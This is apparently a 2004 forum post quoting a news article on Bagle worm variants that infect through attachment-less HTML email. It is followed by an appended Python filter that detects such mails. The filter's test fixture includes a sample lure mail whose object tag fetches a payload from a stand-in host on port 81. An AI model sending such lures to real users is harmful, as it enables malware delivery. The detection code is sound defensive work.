22nd Mar 04, 09:03 PM
lickablepig
BetaONE Supporter

Join Date: Oct 2001
Location: PST -08:00
Posts: 261
Quote:
Well I woke up this morning and checked my messages
Sorry to hear that, at least you had backed up recently... I was just reading this before logging on to B1 and seeing your post...

Quote:
A handful of Bagle worm variants are attacking Windows users with an insidious new twist:
They can infect computers without tricking users into opening a file attachment -- opening an e-mail is all it takes.

The passel of new worms sport a virtual alphabet soup of labels: "Bagle.q," "Bagle.r," "Bagle.s" and "Bagle.t." Some security firms have dubbed the new variants "beagle." They are mutations of the original Bagle worm first discovered in January.

Bagle exploits a flaw in Outlook, revealed in October of 2003, that allows a hacker to upload and execute a file on a user's PC without that user opening the file. Microsoft issued a patch for the flaw in October, but users who have not updated their systems with this patch are at risk.


Two-Step Process
The e-mails carrying the new Bagle variants do not have attachments. Experts speculate that the virus writers developed this non-attachment technique to bypass a common firewall technique called "gateway scanning," which intercepts any e-mail with an attachment.
When a user opens an e-mail carrying one of these new Bagle variants, the e-mail "goes back out to the Internet and tries to find a certain server that has the Bagle executable on it and bring it down through HTTP."


First, the carrier e-mail connects through port 81 to the host server and opens a maliciously coded HTML file. Then a Visual Basic Script (VBS) file is sent to the victim's machine, which connects to the same server and downloads the virus via HTTP.

"That shouldn't be allowed to happen. Opening an e-mail doesn't give some remote machine the authority to drop down a VBS script onto your system. The vulnerability allows that to happen."

If a user's machine is properly patched, Bagle poses no threat.

One-Upmanship Game
There have been so many variations on the original Bagle worm that some security experts speculate that virus writers are playing a game of one-upmanship as they create and spread new mutations.


"There have actually been messages between the virus writers embedded within the viruses. The authors of Netsky, Bagle and MyDoom are really at each other's throats trying to create more viruses and outdo each other.

"It's having a horrible impact on the end-users who are the target of these attacks."

Disabling Firewalls
Like earlier versions of Bagle, the new variations disable many firewall and antivirus applications, a technique that has become common among virus writers.


They also spread like the original Bagle, by resending themselves to all addresses found on a user's hard drive, disguising the return address of the e-mail to conceal the identity of the infected machine.

The mass-mailed worm uses a broad array of typical spam-virus subject lines, such as "Fax message received" and "account notify."

P2P Networks

The Bagle virus is coded to survive and propagate rather than delete files, as some worms do. "They are not generally destructive, but they put a huge load on e-mail servers, they cause outages, and there's a cost associated with un-infection."

Bagle infects every .exe file on a victim's system, meaning it lurks stubbornly even on apparently cleaned systems.

The worms will keep hundreds of software programs from running, and they deactivate configuration applications, such as regedit and msconfig, that are used to delete viruses.

Bagle places itself -- with a variety of invented file names -- in folders that are commonly used for file-swapping. So, a large P2P network like Kazaa becomes an effective tool for mass propagation.
__________________
jizac_aka_lickablepig
(Y) (jizac)
(':') |/
("(")_)0
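Added example, not part of the post above or of the quoted article: the article's point is that gateway scanners which only intercept attachments miss a mail whose HTML body reaches out to a remote host (here on TCP port 81) to fetch the payload. The Python filter below parses an RFC 822 message, extracts every remote reference from its text/html parts, and flags two things: elements that load active remote content when rendered (object, embed, iframe, script, applet) and references to non-standard ports. The two sample messages, the hostnames, the IP address and the choice of ports 80/443 as the "expected" baseline are all constructed assumptions for illustration, not captured Bagle traffic.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample, not a captured Bagle message: an HTML-only mail with
# no attachment whose body pulls an HTML object from a remote host on TCP 81,
# the attachment-less pattern the article describes.
SUSPICIOUS_MAIL = """From: fax@example.net
To: victim@example.org
Subject: Fax message received
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body>
<p>Your fax is ready.</p>
<object data="http://198.51.100.7:81/index.html" type="text/html"></object>
</body></html>
"""

# Constructed benign sample: an HTML mail that only loads an image over port 80.
BENIGN_MAIL = """From: newsletter@example.com
To: victim@example.org
Subject: account notify
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body><img src="http://www.example.com/logo.gif" alt="logo"></body></html>
"""

# Elements that load and run remote content when the message is rendered.
ACTIVE_TAGS = {"object", "embed", "iframe", "script", "applet"}
# Assumed baseline: HTTP(S) on the standard ports is normal in mail bodies.
EXPECTED_PORTS = {80, 443}


class RemoteRefCollector(HTMLParser):
    """Collect (tag, url) pairs for every attribute that names a remote resource."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "data", "href", "codebase") and value:
                self.refs.append((tag.lower(), value))


def html_bodies(msg):
    """Yield the decoded text of every text/html part in the message."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def analyze(raw_message):
    """Return {'attachment': bool, 'findings': [str]} for one RFC 822 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    has_attachment = any(
        part.get_content_disposition() == "attachment" for part in msg.walk()
    )
    findings = []
    for body in html_bodies(msg):
        collector = RemoteRefCollector()
        collector.feed(body)
        for tag, url in collector.refs:
            parsed = urlparse(url)
            if parsed.scheme not in ("http", "https"):
                continue
            # Default port when the URL names none.
            port = parsed.port or (443 if parsed.scheme == "https" else 80)
            if tag in ACTIVE_TAGS:
                findings.append(f"<{tag}> loads remote content from {url}")
            if port not in EXPECTED_PORTS:
                findings.append(f"remote reference on non-standard port {port}: {url}")
    return {"attachment": has_attachment, "findings": findings}


if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS_MAIL), ("benign", BENIGN_MAIL)):
        print(label, analyze(raw))
```

The suspicious sample has no attachment at all, which is exactly why an attachment-only gateway check would pass it; both of its findings come from the HTML body. A real deployment would feed `analyze()` from the mail gateway's message stream and treat any non-empty `findings` list on an attachment-less message as a quarantine signal.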